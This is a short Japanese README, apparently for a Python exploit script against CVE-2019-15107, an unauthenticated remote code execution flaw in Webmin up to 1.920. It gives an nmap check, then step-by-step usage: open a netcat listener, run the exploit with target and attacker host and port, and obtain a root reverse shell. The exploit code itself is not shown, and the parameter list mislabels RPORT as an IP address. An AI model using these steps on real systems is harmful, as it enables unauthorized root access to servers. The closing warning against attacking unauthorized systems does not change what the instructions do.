
CVE-2019–15107 - 未認証RCE Webmin <=1.920
このPythonスクリプトは Webmin 1.890 で root シェルを取得できます。
nmapで確認:
nmap -sC -sV -p 10000 TARGET_IP
結果:
10000/tcp open http MiniServ 1.890 (Webmin httpd)
このエクスプロイトの使い方:
ステップ 1:
nc -lnvp LPORT
ステップ 2:
chmod +x exploit.py
./exploit RHOST RPORT LHOST LPORT
RHOST = the target
RPORT = the target IP address (Usually 10000)
LHOST = your kali box
LPORT = your reverse shell port
ステップ 3: rootシェルを取得!
許可のないシステムに害を加えないでください!!!